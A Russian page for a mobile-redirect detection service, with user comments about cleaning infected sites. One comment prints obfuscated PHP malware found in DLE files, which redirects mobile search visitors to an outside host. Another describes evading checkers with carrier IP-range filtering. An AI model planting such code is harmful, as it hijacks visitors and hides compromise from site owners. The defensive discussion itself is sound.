Всего выявлено 72 096 редиректов
Удалить мобильный редирект

Мобильный редирект – перенаправление на другой ресурс всех посетителей сайта, которые зашли с мобильного устройства, ресурс в основном вредоносный, который предлагает обновить браузер (например, Opera Mini), после обновления такого браузера, со счета телефона снимаются деньги, также такие сайты распространяют разнообразные вирусы. В основном владелец сайта может и не подозревать, что на его ресурсе присутствует подобный редирект.

Чтоб выявить мобильный редирект нужно зайти на сайт с мобильного телефона/планшета, или воспользоваться данным сервисом. Сервис эмулирует мобильное устройство и шлет запрос на сайт который проверяется, анализирует и выводит полученный результат.

Сервис находит 99% всех редиректов, как серверных, так и пользовательских. Серверный редирект – это перенаправление на другой сайт средствами .htaccess или через серверный язык программирования (например, PHP, Perl, Python, Ruby). Пользовательский редирект (клиентский, браузерный) реализован в основном через JavaScript, даже если код JavaScript на сайте закодирован, редирект все равно будет выявлен. Зная тип редиректа, можно быстрее его найти в файлах сайта, для поиска используйте скрипт FAR.

  • да, есть такое, иногда рекламные площадки показывают рекламу с редиректом, а сервис не выявляет так как реклама меняется каждый раз, пишите этим площадкам, выясняйте как запретить такую рекламу, у некоторых это можно отключить в настройках
  • Тест не выявил редиректа. Но тем не менее пользователи жалуются что он бывает. Я как то раз в режиме отладки через телефон его поймал, и был очень удивлен что инициировал этот переход Гугл Адсенсе. Даже не знаю что и делать. Если эту рекламу снять то денег не будет на сервер, а если оставить то такой бардак долго будет продолжаться.
  • В таких ситуациях нужна лишь помощь специалистов
  • Нашла серверный редирект на 3х из 4х сайтов. 1и 2 сайт на движке вордпресс, 3 сайт на виксе. 4 одна html страница. 1и 2 сайт на одном хостинге HC,ru, 3 на виксе на другом, 4й сайт на НИКе. И что теперь делать? Я так поняла это не проблема в хостинге подразумеваю, что 1 и 2 сайте хранится где-то в коде плагина? Подскажите пожалуйста, помогите разабраться и найти эту заразу(((
  • Олично! Нашла редирект ...попробуем исправить.
  • Нашел редирект! Крутой сервис. Лежал в index.php и в frame.js на поиски ушел час по ключевикам android, navigator.userAgent, windows.location а также "http://"
  • Сергей можно по подробней. Что это такое. Как так получается
  • Привет. Сайт пример ещё нужен?
  • Доброго времени суток! Появились методы вычисления кода вредоносного мобильного редиректа? что работает только через 3G?
  • Хе-хе! А за что мой комментарий удалён? Да, я сказал, что сервис не может полноценно выявить редирект, так как одной строки UserAgent недостаточно и нужно выявлять через реально устройство. За это нужно удалять?
  • Здравствуйте, Сергей! я перековырял тонну всего... пролистал вручную огромное количество кодов файлов движка и плагинов, но ничего не нашлось. проблему решил переездом на другой хостинг...скорее всего вредонос был в БД.
  • нужен пример вредоносного кода
  • исправлю
  • Ну как же так!? Устарел сервис или что?В общем у меня на сайте вредоносный редирект! Работает только через 3G,через вай фай все ок! Перенаправляет в секс магазин,хотел позвонить этим оркам,чтоб узнать куда они код вмтавили,да они в Украине..Поможет кто советом? .htaccess чистые
  • Блин у меня видимо скрытые ссылки на редирект, я не сутки не сплю и не ем, я 3-е суток не сплю и не ем, не могу найти его.
  • Помогите удалить мобильный редирект.
  • Почему-то редирект с URL кирилицей на её punycode тоже считается вредоносным
  • Спасибо!
  • судя по папке с шаблоном у тебя Joomla, вирусы могут залезать через компоненты или модули... если есть бесплатные с вареза - то 100% оттуда...
  • исправил, находит и на JavaScript
  • исправил, находит и на JavaScript
  • исправил
  • ну давайте поговорим sergey@cmsdev.org
  • вы потому и не видели, что его трудно обнаружить. я могу вам помочь с реализацией кода для поиска, если интересно.
  • "ТОЛЬКО такой способ" ниодного не видел, повторюсь, дайте пример с рабочего сайта
  • зачем хранить перечень ip в коде? диапазоны хранятся в базе данных, которая удобно редактируется. На практике сейчас применяется ТОЛЬКО такой способ, ведь все остальные мобильные редиректы - это атавизмы, как пережитки прошлого.
  • Ну ни разу я не видел перечень IP в коде. И считаю, что на практике это никто не будет применять, так как это сужает круг пользователей, это мое мнение конечно
  • Я же говорил, что вы не понимаете суть мобильного редиректа. Главный смысл его и задача - не сливать как можно больше пользователей. Основной смысл - сделать так, чтобы про этот редирект не узнал владелец сайта. А список диапазонов подсетей mts выглядит вот так: 213.87.116.0/23 84.17.224.252/32 84.17.254.0/23 95.153.160.0/19 95.153.250.0/23 95.153.252.0/22 213.87.54.0/24 213.87.55.0/24 213.87.72.73/32 80.83.239.0/25 80.83.238.246/32 217.8.236.11/32 217.8.238.0/24 217.8.239.0/24 80.83.224.0/25 80.83.228.0/22 80.83.232.0/23 80.83.237.0/25 80.83.238.0/25 213.87.80.0/20 213.87.94.0/24 95.153.192.0/20 95.153.208.0/21 95.153.244.0/22 95.153.248.0/21 213.87.248.0/22 213.87.104.0/23 213.87.100.0/22 213.87.96.0/23 217.8.230.0/23 217.8.228.0/23 213.87.95.0/24 217.66.146.0/26 217.66.148.0/24 217.66.149.0/24 217.66.150.0/24 217.66.151.0/24 217.66.155.0/24 217.74.246.0/23 217.8.235.194/32 217.8.234.0/24 213.87.6.8/32 213.87.65.5/32 213.87.65.6/32 213.87.74.0/24 213.87.76.0/24 213.87.77.0/24 213.87.8.0/21 213.87.80.0/21 213.87.54.0/23 213.87.240.0/22 195.74.84.32/32 213.87.112.0/23 213.87.114.0/23 213.87.118.0/23 213.87.120.0/22 213.87.124.0/24 213.87.125.0/24 213.87.128.0/20 213.87.94.0/23 217.66.145.15/32 217.74.244.13/32 217.74.245.0/24 217.74.247.128/25 217.74.248.0/22 217.74.252.0/23 217.8.226.0/23 217.8.228.0/22 217.8.232.0/23 217.74.244.128/25 217.66.159.0/24 217.66.145.16/32 217.66.146.0/24 217.66.147.0/24 217.66.148.0/22 217.66.152.0/24 217.66.156.0/24 217.66.157.0/24 217.66.158.0/24 194.54.148.8/32
  • в теории такая проверка возможна, но на практике такого я не встречал, вредоносный редирект нацелен на то, чтоб как можно больше пользователей перекинуть на другой сайт, и никто не будет себя ограничивать Россией или Украиной, а перечислить IP всех операторов стран Европы например невозможно, вот как выглядят IP только Украины и России http://www.procontent.ru/dev/gateway-ips.html список не малый, потому, то что вы пишите, на практике вряд ли применяется, или применяется очень редко
  • затем, чтобы ваш сервис не смог найти такие редиректы, что за глупый вопрос?
  • редирект происходит только у устройств, ip адрес которых проходит проверку по регулярному выражению, на принадлежность к диапазону подсети оператора сотовой связи, например tele2
  • все дело в том, что вы не понимаете принцип мобильного редиректа. Ваша проверка осуществляется при помощи установки user-agent'a мобильного устройства и проверки статуса ответа от сервера. Но хороший мобильный редирект фильтрует трафик не только по значениям заголовков http запроса, но и по диапазонам подсетей.
  • потому, что он не находит мобильный редирект на сайте, на котором он заведомо есть
  • Cервис супер.Я искала вирус сутки(не спала и не ела)-так и не нашла.Но проблему решила и когда он появился через неделю опять я уже знла как его выкинуть.Первый раз я полностью переустановила движок и методом тыка перезаливала все файлы на хост(конечно нужно иметь бекап).Сегодня я просто перезалила папку с шаблоном (/ваш сайт.ру/templates/ваш шаблон) с бекапа и всё-эта сволочь исчезла.Но вот проблема откуда он берётся не решилась-может кто подскажет.
  • Как связаться с автором скрипта проверки на редирект? Напишите вконтакте пожалуйста, ечсть профессиональное предложение
  • Обращайся помогу. Но нужен доступ к файлам по фтп... Движок DLE?
  • Никак не могу найти где он сидит на сайте HALP!
  • Не понимаю почему не проверяются мои сайты (Ошибка соединения)
  • Платные скрипты - бесплатно ...
  • Меня дважды эта гадость посещала. В первый раз я даже и не знал. Сама ушла. Сидел и недоумевал куда подевался трафик. Увидел в истории что редирект сидел на сайте. Яндекс мне об этом писал, а я и в ус не дую ( что сказать - ламер да и только). Сейчас узнал только когда один френд написал в личку. Начал копаться. Сам код так и не нашёл - нет знаний. Поставил автомат проверку и чистку. Вычистил.
  • спасибо за проверку
  • Если у кого сайт на DLE вирусы - вам поможет эта статья
  • Сам час потратил на поиск, код вируса ниже: " $usg = strtolower($_SERVER[strrev(strtoupper('tnega_resu_ptth'))]);$ref = $_SERVER[strrev(strtoupper('tsoh_ptth'))];$rf = $_SERVER[strrev(strtoupper('rerefer_ptth'))]; if(!preg_match('/crawl|andex|oogle|bot/i',$usg)) {if(preg_match('/andex|mail|rambler|oogle|bot/i',$rf)) { if((preg_match('/ndroid|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone|htc_/i',$usg)) and (!isset ($_COOKIE['dle_user_id'])) and ($_COOKIE["mt_"] != 1)) {@setcookie('mt_', '1', time()+86400 * 7, '/'); header(strrev('=rerefer&5?'.'/ten.'.'lld-'.'swen'.'//:pt'.'th :noi'.'tac'.'oL').$ref);exit;}}} " У себя нашел в файлах: \engine\classes\mysql.php \engine\modules\gzip.php
  • Супер, спасибо за инструмент, очень удобно.
  • Излечу аська 868283
  • Чистка от мобильных редиректов, установка чекера изменения файлов - skype:acuena
  • кто в курсе как избавиться??
  • были вирусы мобильный реддирект ставите права на запись 000 !!
  • чист)
  • Моя аська 886632
  • Все облазил и не могу найти, сайт на дле. Помогите пожалуйста
  • ваш сервер не находит а яндекс нашел
  • А у меня редирект обнаружен. Как узнать, из какого точно файла?
  • Всем привет. Проверил у Вас сайт на моб. редирект. Ответ сервера 200, редирект не обнаружен. А Яндекс утверждает обратное. Кому верить?
  • Хм, заходил с планшета на меня перекину на
  • Последнее время, у меня начиная с этого года, почти все сайты на DLE подверглись заражению мобильного редиректа. Мошенники внедряют вредоносный код через аваторку при регистрации. Эта дыра в DLE обнаружена во всех версиях DLE. Шел умеет перезаписывать права доступа к любому файлу. Лечится, возможно, полным закрытием регистрации на сайте либо запрет на загрузку аваторки. Заражаются файлы: /engine/data/config.php /engine/data/dbconfig.php /engine/init.php /engine/engine.php /language/Russian/website.lng Зараженные Сайты высвечиваются в вебмастер яндекс как потенциально опасные и попадают под фильтр. Вот такие вот ублюдки вместе с нами в сети сидят, которые занимаются этим....
  • в смысле? если заходишь через мазилу в мобильном он скачивает сразу какую то прогу
  • А, так он на другой ВАШ сайт редиректит... Это хостеру стучите - он что то напортачил.
  • ...
  • Сайт тот что у вас на странице или другой?
  • Я заново перезалила движек, но проблема все равно наблюдается , м файл htaccess тоже перезалила
  • Анечка, проблема 99% в файле htaccess. Замените его на заведомо правильный и позаботьтесь о защите своего сайта. В частности обновите версию движка и всех установленных модулей до последних версий, установите правильные права на файлы, закройте доступ к сайту по фтп и т.д.
  • Я проверила через Ваш сервис " Редирект не обнаружен Ответ сервера: 200 Время запроса: 1.295 сек.", но когда захожу с мобильного именно с мазилы все равно перенаправляет, а с оперы нет. В чем может быть проблема?
  • Весьма благодарен за ваш сервис. Если бы поставили кнопочку посодействовать в развитии - с удовольствием пожертвовал бы десяточку-другую. Еще раз спасибо.
  • В моем случае взломали сервер хостинг-компании МультиХост (соответственно редиректились все сайты на одном IP адресе). Технической поддержкой, несмотря на свои аргументы, я был скажем прямо послан... После переноса сайта на другой хостинг проблема ушла. Редирект осуществлялся только при переходе с поисковых систем Яндекс и Гугл на мобильных устройствах.
  • У меня тоже ломали ftp и на сайт вешали мобильный редирект, я находил его в файле .htaccess
  • У меня вот вопрос. А как выявить, откуда идёт этот редирект?
  • не работает на сегодня:( сайты сейчас переводят при заходе с мобильных устройств и из mac os